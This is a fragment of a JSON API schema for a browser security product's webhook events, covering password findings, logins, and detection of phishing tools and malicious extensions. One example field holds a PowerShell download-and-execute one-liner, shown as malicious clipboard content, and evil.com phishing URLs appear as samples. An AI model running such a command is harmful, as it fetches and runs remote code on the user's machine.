been blocked by your organisation's policy.","nullable":true},"buttonText":{"type":"string","description":"The button text on the banner. Only applicable in WARN mode.","example":"Upload anyway","nullable":true}}}}}},"components/schemas/FindingType":{"id":"components/schemas/FindingType","kind":"json-schema","title":"FindingType","data":{"title":"FindingType","type":"string","enum":["MFA_NOT_REGISTERED","REUSED_PASSWORD","SHARED_ACCOUNT","UNUSED_THIRD_PARTY_APP","WEAK_PASSWORD","LEAKED_PASSWORD","PASSWORD_MANAGER_NOT_USED","STOLEN_CREDENTIALS"],"x-enumDescriptions":{"MFA_NOT_REGISTERED":"This account does not have MFA.","REUSED_PASSWORD":"The password used on the account is being reused.","SHARED_ACCOUNT":"The account credentials are being shared with another employee.","UNUSED_THIRD_PARTY_APP":"Deprecated; no longer in use but still accepted for compatibility.","WEAK_PASSWORD":"The password used on the account is weak.","LEAKED_PASSWORD":"The password used on the account has been leaked in a data breach.","PASSWORD_MANAGER_NOT_USED":"The employee typically uses manually typed passwords, rather than a password manager.","STOLEN_CREDENTIALS":"The credentials used on the account have been identified as stolen."},"description":"The type of finding"}},"components/schemas/FindingState":{"id":"components/schemas/FindingState","kind":"json-schema","title":"FindingState","data":{"type":"string","enum":["OPEN","RESOLVED"],"x-enumDescriptions":{"OPEN":"The finding has been confirmed and is open.","RESOLVED":"The finding has been resolved and is no longer an issue."},"description":"The state of the finding"}},"components/schemas/FindingEvent":{"id":"components/schemas/FindingEvent","kind":"json-schema","title":"Finding","data":{"title":"Finding","type":"object","description":"This object represents a finding in your organization.","properties":{"id":{"type":"string","description":"Unique identifier for the finding","example":"d6a32ba5-0532-4a66-8137-48cdf409c972"},"type":{"$ref":"#/components/schemas/FindingType"},"state":{"$ref":"#/components/schemas/FindingState"},"employeeId":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"ID of the employee this finding is linked to, "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if finding is not linked to an employee."},"children":[]}]}]}],"example":"379ac7ea-ff2a-42ef-af37-06d2020dc46a","nullable":true},"employee":{"type":"object","nullable":true,"allOf":[{"$ref":"#/components/schemas/EmployeeInEvent"}]},"passwordId":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"ID of the password this finding is linked to, "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if finding is not linked to a password."},"children":[]}]}]}],"example":"c4a045a1-5331-4714-af83-6a361e98960d","nullable":true},"accountId":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"ID of the account this finding is linked to, "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if finding is not linked to an account."},"children":[]}]}]}],"nullable":true},"appType":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The type of app this finding is linked to, "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if finding is not linked to an app."},"children":[]}]}]}],"example":"PUSH_SECURITY","nullable":true},"appId":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"ID of the app this finding is linked to, "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if finding is not linked to an app."},"children":[]}]}]}],"example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0","nullable":true},"creationTimestamp":{"type":"integer","description":"When this finding was first observed, formatted as a UNIX timestamp (in seconds)","example":1698064423}}}},"components/schemas/AdminAuditLogActorNullEmail":{"id":"components/schemas/AdminAuditLogActorNullEmail","kind":"json-schema","title":"Admin Audit Log Actor","data":{"title":"Admin Audit Log Actor","type":"object","description":"This object contains information about the user that performed the action triggering the audit log.","properties":{"source":{"type":"string","enum":["UI"],"description":"The source of the action that generated the event."},"email":{"type":"string","nullable":true,"description":"The actor's email address is not available for this webhook."},"sourceIpAddress":{"type":"string","description":"The IP address of the actor."},"userAgent":{"type":"string","nullable":true,"description":"The user agent of the actor, if available."}},"required":["source","email","sourceIpAddress","userAgent"]}},"components/schemas/WeakPasswordReasonsType":{"id":"components/schemas/WeakPasswordReasonsType","kind":"json-schema","title":"WeakPasswordReasonsType","data":{"type":"string","enum":["COMMON_BASE_WORD","BANNED_BASE_WORD"],"x-enumDescriptions":{"COMMON_BASE_WORD":"The base word is a derivative of top 10000 most used passwords.","BANNED_BASE_WORD":"The password is a derivative of a custom banned word."},"description":"Reason a password is weak"}},"components/schemas/LoginType":{"id":"components/schemas/LoginType","kind":"json-schema","title":"LoginType","data":{"title":"LoginType","type":"string","enum":["OIDC_LOGIN","SAML_LOGIN","PASSWORD_LOGIN","FEDCM_LOGIN"],"nullable":true,"description":"All possible ENUM values for login types"}},"components/schemas/LoginEvent":{"id":"components/schemas/LoginEvent","kind":"json-schema","title":"Login","data":{"title":"Login","type":"object","description":"This object represents a login event, indicating when an employee accesses an application by logging in.","properties":{"employeeId":{"type":"string","description":"Identifier of employee who used this account","example":"72d0347a-2663-4ef5-b1c5-df39163f1603"},"accountId":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Identifier for the account that was logged into. This value is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"workApp=false"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}],"example":"37cda962-7e78-49bc-8721-1becd16276a3","nullable":true},"appType":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The app associated with this account. This value is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"workApp=false"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}],"example":"ATLASSIAN","nullable":true},"appId":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The identifier of the app associated with this account. This value is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"workApp=false"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}],"example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0","nullable":true},"email":{"type":"string","description":"The email address used to log into the account","format":"email","example":"john.hill@example.com"},"loginTimestamp":{"type":"integer","description":"When the login occurred. Formatted as a UNIX timestamp (in seconds).","example":1698064423},"loginUrl":{"type":"string","description":"The URL where the login took place.","example":"https://www.example.com/login"},"workApp":{"type":"boolean","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Whether the app is recognized as a commonly used work app. "},"children":[]},{"$$mdtype":"Node","type":"link","inline":true,"attributes":{"href":"https://console.pushsecurity.com/integration/supported/"},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Learn more"},"children":[]}]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}],"example":true},"passwordManuallyTyped":{"type":"boolean","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Whether the password was manually typed (or a password manager was used). This value is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if password authentication was not used."},"children":[]}]}]}],"example":true,"nullable":true},"passwordManager":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The password manager used to log in. This value is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if a password manager was not detected."},"children":[]}]}]}],"example":"ONEPASSWORD","nullable":true,"enum":["ARC_BUILTIN","BITWARDEN","BRAVE_BUILTIN","CHROME_BUILTIN","CLIPBOARD_PASTE","DASHLANE","EDGE_BUILTIN","FIREFOX_BUILTIN","ISLAND_BUILTIN","KEEPER","LASTPASS","OKTA","ONEPASSWORD","OPERA_BUILTIN","PRISMA_ACCESS_BUILTIN","SAFARI_BUILTIN","UNKNOWN"],"x-exclude-enums":{"environments":["production"],"values":["ATLAS_BUILTIN","COMET_BUILTIN","DIA_BUILTIN"]}},"weakPassword":{"type":"boolean","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"True if the password used was considered weak. This value is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if password authentication was not used."},"children":[]}]}]}],"example":true,"nullable":true},"weakPasswordReasons":{"type":"array","items":{"$ref":"#/components/schemas/WeakPasswordReasonsType"},"description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Reasons a password is weak. This value is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"weakPassword"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"false"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" or "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}],"nullable":true},"leakedPassword":{"type":"boolean","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Whether the password used on the account has been leaked in a data breach or not. This value is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if password authentication is not used."},"children":[]}]}]}],"example":true,"nullable":true},"loginType":{"$ref":"#/components/schemas/LoginType"},"identityProvider":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The identity provider used to authenticate. This value is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if password authentication was used."},"children":[]}]}]}],"nullable":true,"example":"OKTA"},"sourceIpAddress":{"type":"string","description":"The IP address of the user logging in.","example":"8.158.25.38"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","description":"The user agent string reported by the browser","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"},"passwordId":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The identifier of the password used to login.  This value is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if password authentication was not used."},"children":[]}]}]}],"nullable":true,"example":"9c816f55-7453-49e5-bc60-6b1b9b38cadc"},"passwordChanged":{"type":"boolean","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Whether the password has changed since the last login on this browser. This value is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if unavailable."},"children":[]}]}]}],"nullable":true,"example":true}}}},"components/schemas/MaliciousBrowserExtensionDetectedEvent":{"id":"components/schemas/MaliciousBrowserExtensionDetectedEvent","kind":"json-schema","title":"Malicious browser extension detected","data":{"title":"Malicious browser extension detected","type":"object","description":"This object represents a malicious browser extension detected event, indicating an employee installed, enabled or attempted to use a browser extension that was identified as malicious.","properties":{"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"extensionId":{"type":"string","description":"ID of the malicious browser extension","example":"dljjddkmmcminffjbcmeccgfbjlhmhlm"},"extensionName":{"type":"string","description":"Name of the browser extension that was observed/blocked (only populated if the browser extension has been previously observed)","example":"Example Extension","nullable":true},"browserExtensionBlocked":{"type":"object","description":"Details about the browser extension block (only present for block events)","nullable":true,"properties":{"title":{"type":"string","description":"The title of the malicious extension block page","example":"Extension Blocked"},"subtext":{"type":"string","description":"The subtext of the malicious extension block page","example":"This extension has been blocked by your administrator"}}},"trigger":{"type":"string","description":"Enum describing the trigger for the block action (only present for block events)","nullable":true,"enum":["DISABLED_ON_INSTALL","DISABLED_ON_USER_ENABLE","DISABLED_ON_FIRST_SEEN","BLOCKED_ON_STORE_VISIT"],"example":"DISABLED_ON_INSTALL"},"sourceIpAddress":{"type":"string","description":"The IP address of the user","example":"8.158.25.38"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","description":"The user agent string reported by the browser","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"}}}},"components/schemas/MaliciousCopyPasteDetectedEvent":{"id":"components/schemas/MaliciousCopyPasteDetectedEvent","kind":"json-schema","title":"Malicious copy and paste detected","data":{"title":"Malicious copy and paste detected","type":"object","description":"This object represents a malicious copy and paste detected event, indicating an employee visited a URL which copied malicious content into their clipboard.","properties":{"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"url":{"type":"string","description":"The URL that triggered this detection.","example":"https://evil.com/okta.php"},"referrerUrl":{"type":"string","description":"The URL the user was on before the malicious copy and paste was detected.","example":"https://statics.teams.cdn.office.net/","nullable":true},"mode":{"type":"string","nullable":true,"enum":["OFF","MONITOR","WARN","BLOCK"],"description":"Mode that the malicious copy and paste detection control is in."},"payload":{"type":"string","nullable":true,"description":"The clipboard contents that triggered this alert.","example":"powershell -c iex(iwr -Uri example.com -UseBasicParsing)"},"action":{"type":"string","nullable":true,"enum":["DISPLAYED","IGNORED"],"description":"The action taken by the control when the malicious copy and paste was detected."},"sourceIpAddress":{"type":"string","description":"The IP address of the user.","example":"8.158.25.38"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","description":"The user agent string reported by the browser.","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"}}}},"components/schemas/MfaEnforcementEvent":{"id":"components/schemas/MfaEnforcementEvent","kind":"json-schema","title":"MFA enforcement","data":{"title":"MFA enforcement","type":"object","description":"This object represents an MFA enforcement event.","properties":{"mfaEnforcement":{"type":"object","properties":{"title":{"type":"string","description":"The title of the MFA enforcement banner.","example":"MFA enforcement"},"subtext":{"type":"string","description":"The subtext of the MFA enforcement banner.","example":"You are required to enable MFA on this platform."},"buttonText":{"type":"string","description":"The button text of the MFA enforcement banner.","example":"I'll do it now"}}},"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"appType":{"type":"string","description":"The type of app that the MFA enforcement is for.","example":"GITHUB"},"action":{"type":"string","enum":["DISPLAYED","ACKNOWLEDGED"],"description":"The action taken by the user in response to the MFA enforcement."},"sourceIpAddress":{"type":"string","description":"The IP address of the user.","example":"8.158.25.38"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","description":"The user agent string reported by the browser","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"}}}},"components/schemas/PasswordLoggingPreventionEvent":{"id":"components/schemas/PasswordLoggingPreventionEvent","kind":"json-schema","title":"Password Logging Prevention","data":{"title":"Password Logging Prevention","type":"object","description":"This object represents a password logging prevention event.","properties":{"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"title":{"type":"string","description":"The title of the password logging prevention prompt.","example":"Password entered in a non password field"},"subtext":{"type":"string","description":"The subtext of the password logging prevention prompt.","example":"It looks like you entered your password into a non password field."},"url":{"type":"string","description":"The frame url this password event occurred","example":"https://mysite.com/form/event"},"tabUrl":{"type":"string","description":"The tab url this password event occurred","example":"https://mysite.com/form/event/tab"},"appType":{"type":"string","description":"The type of application where the password logging prevention was triggered.","example":"GITHUB"},"mode":{"type":"string","nullable":true,"enum":["OFF","MONITOR","BLOCK"],"description":"Mode that the password logging prevention control is in."},"sourceIpAddress":{"type":"string","description":"The IP address of the user.","example":"8.158.25.38"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","description":"The user agent string reported by the browser","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"}}}},"components/schemas/SsoPasswordProtectionModeType":{"id":"components/schemas/SsoPasswordProtectionModeType","kind":"json-schema","title":"SsoPasswordProtectionModeType","data":{"title":"SsoPasswordProtectionModeType","enum":["BLOCK","MONITOR","WARN","OFF"],"description":"The mode that SSO password protection is in."}},"components/schemas/SsoPasswordProtectionActionType":{"id":"components/schemas/SsoPasswordProtectionActionType","kind":"json-schema","title":"SsoPasswordProtectionActionType","data":{"title":"SsoPasswordProtectionActionType","enum":["DISPLAYED","IGNORED"],"description":"The action that the user took while on the SSO password protection page.","nullable":true,"type":"string"}},"components/schemas/SsoPasswordUsedEvent":{"id":"components/schemas/SsoPasswordUsedEvent","kind":"json-schema","title":"SSO Password used","data":{"title":"SSO Password used","type":"object","description":"This object represents an SSO password used event, indicating when an employee has typed a known IdP password into an unknown domain.","properties":{"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"mode":{"$ref":"#/components/schemas/SsoPasswordProtectionModeType"},"action":{"nullable":true,"$ref":"#/components/schemas/SsoPasswordProtectionActionType"},"url":{"type":"string","description":"The URL the user entered the password into","example":"https://evil.com/okta.php","nullable":true},"referrerUrl":{"type":"string","description":"The URL the user was on before entering the password","example":"https://statics.teams.cdn.office.net/","nullable":true},"email":{"type":"string","description":"The email address used to log into the account","format":"email","example":"john.hill@example.com"},"appType":{"type":"string","description":"The IdP password that was entered","example":"OKTA"},"sourceIpAddress":{"type":"string","description":"The IP address of the user logging in.","example":"8.158.25.38"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","description":"The user agent string reported by the browser","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"}}}},"components/schemas/PhishingToolDetectedEvent":{"id":"components/schemas/PhishingToolDetectedEvent","kind":"json-schema","title":"Phishing tool detected","data":{"title":"Phishing tool detected","type":"object","description":"This object represents a phishing tool detected event.","properties":{"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"indicator":{"type":"string","example":"AITM_TOOL_EVILGINX_01"},"url":{"type":"string","description":"The URL the phishing tool was detected on","example":"https://evil.com/okta.php"},"referrerUrl":{"type":"string","description":"The URL the user was on before the phishing tool was detected","example":"https://statics.teams.cdn.office.net/","nullable":true},"sourceIpAddress":{"type":"string","description":"The IP address of the user.","example":"8.158.25.38"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","description":"The user agent string reported by the browser","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"},"mode":{"type":"string","nullable":true,"enum":["OFF","MONITOR","WARN","BLOCK"],"description":"Mode that the phishing tool detection control is in."},"action":{"type":"string","nullable":true,"enum":["DISPLAYED","IGNORED"],"description":"The action that the user took while on the phishing tool detection page."}}}},"components/schemas/PasswordProtectionModeType":{"id":"components/schemas/PasswordProtectionModeType","kind":"json-schema","title":"PasswordProtectionModeType","data":{"title":"PasswordProtectionModeType","enum":["BLOCK","MONITOR","WARN","OFF"],"description":"The mode that SSO password protection is in."}},"components/schemas/PasswordProtectionActionType":{"id":"components/schemas/PasswordProtectionActionType","kind":"json-schema","title":"PasswordProtectionActionType","data":{"title":"PasswordProtectionActionType","enum":["DISPLAYED","IGNORED"],"description":"The action that the user took while on the SSO password protection page.","nullable":true,"type":"string"}},"components/schemas/ProtectedPasswordEnteredEvent":{"id":"components/schemas/ProtectedPasswordEnteredEvent","kind":"json-schema","title":"Protected password entered","data":{"title":"Protected password entered","type":"object","description":"This object represents a protected password entered event, indicating when an employee has typed a known protected password into an unknown domain.","properties":{"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"mode":{"$ref":"#/components/schemas/PasswordProtectionModeType"},"action":{"nullable":true,"$ref":"#/components/schemas/PasswordProtectionActionType"},"url":{"type":"string","description":"The URL the user entered the password into","example":"https://evil.com/okta.php","nullable":true},"referrerUrl":{"type":"string","description":"The URL the user was on before entering the password","example":"https://statics.teams.cdn.office.net/","nullable":true},"email":{"type":"string","description":"The email address used to log into the account","format":"email","example":"john.hill@example.com"},"appType":{"type":"string","description":"The IdP password that was entered","example":"OKTA"},"sourceIpAddress":{"type":"string","description":"The IP address of the user logging in.","example":"8.158.25.38"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","description":"The user agent string reported by the browser","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"}}}},"components/schemas/StolenCredentialsEvent":{"id":"components/schemas/StolenCredentialsEvent","kind":"json-schema","title":"Stolen credentials event","data":{"title":"Stolen credentials event","type":"object","description":"This object represents a stolen credentials event.","properties":{"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"email":{"type":"string","description":"The email associated with the account whose credentials were stolen.","example":"user@example.com"},"appType":{"type":"string","description":"The app whose credentials were detected as stolen.","example":"Google Workspace"},"sourceIpAddress":{"type":"string","description":"The IP address of the user.","example":"8.158.25.38"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","description":"The user agent string reported by the browser","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"},"metadata":{"type":"object","description":"Additional metadata related to the event.","example":{"key":"key"}}}}},"components/schemas/StrongPasswordEnforcementEvent":{"id":"components/schemas/StrongPasswordEnforcementEvent","kind":"json-schema","title":"Strong password enforcement","data":{"title":"Strong password enforcement","type":"object","description":"This object represents a strong password enforcement event.","properties":{"strongPasswordEnforcement":{"type":"object","properties":{"title":{"type":"string","description":"The title of the strong password enforcement banner.","example":"Strong password enforcement"},"subtext":{"type":"string","description":"The subtext of the strong password enforcement banner.","example":"You are required to use a strong password on this platform."},"buttonText":{"type":"string","description":"The button text of the strong password enforcement banner.","example":"I'll do it now"}}},"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"appType":{"type":"string","description":"The type of app that the strong password enforcement is for.","example":"GITHUB"},"action":{"type":"string","enum":["DISPLAYED","ACKNOWLEDGED"],"description":"The action taken by the user in response to the strong password enforcement."},"sourceIpAddress":{"type":"string","description":"The IP address of the user.","example":"8.158.25.38"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","description":"The user agent string reported by the browser","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"}}}},"components/schemas/TelemetryRuleCriteria":{"id":"components/schemas/TelemetryRuleCriteria","kind":"json-schema","title":"TelemetryRuleCriteria","data":{"type":"object","description":"The criteria for applying the rule.","properties":{"employeeGroups":{"allOf":[{"$ref":"#/components/schemas/ControlRuleCondition"}],"description":"Conditions for matching employee groups."},"employeeIds":{"allOf":[{"$ref":"#/components/schemas/ControlRuleCondition"}],"description":"Conditions for matching employee identifiers."}}}},"components/schemas/TelemetryRule":{"id":"components/schemas/TelemetryRule","kind":"json-schema","title":"Telemetry Rule","data":{"title":"Telemetry Rule","type":"object","description":"This object represents a telemetry rule.","nullable":false,"properties":{"ruleId":{"type":"string","description":"The unique identifier for the rule","example":"c478966c-f927-411c-b919-179832d3d50c"},"telemetry":{"type":"string","description":"The telemetry that the rule applies to.","enum":["BROWSER_EVENT_STORAGE","FILE_DOWNLOAD_TELEMETRY","FILE_UPLOAD_TELEMETRY"],"x-enumDescriptions":{"BROWSER_EVENT_STORAGE":"The Browser Event Storage telemetry.","FILE_DOWNLOAD_TELEMETRY":"The File Download telemetry.","FILE_UPLOAD_TELEMETRY":"The File Upload telemetry."}},"description":{"type":"string","description":"The description given to the rule.","example":"Store browser events for engineering team"},"enabled":{"type":"boolean","description":"Whether the rule is enabled.","example":true},"criteria":{"$ref":"#/components/schemas/TelemetryRuleCriteria"},"settings":{"type":"object","description":"The settings for the telemetry."},"lastUpdatedTimestamp":{"type":"integer","description":"When the rule was last updated, formatted as a UNIX timestamp (in seconds).","example":1698604061}},"required":["ruleId","telemetry","description","enabled","criteria","lastUpdatedTimestamp"]}},"schema_624":{"kind":"json-schema","data":{"type":"string"},"id":"schema_624"},"schema_625":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["ACTIVITY"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"employee@example.com downloaded file.exe from https://phishing-site.com/downloads"},"object":{"type":"string","enum":["FILE_DOWNLOAD"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"File download"},"new":{"$ref":"#/components/schemas/FileDownload","description":"The new state of the object."}}},"id":"schema_625"},"schema_626":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs 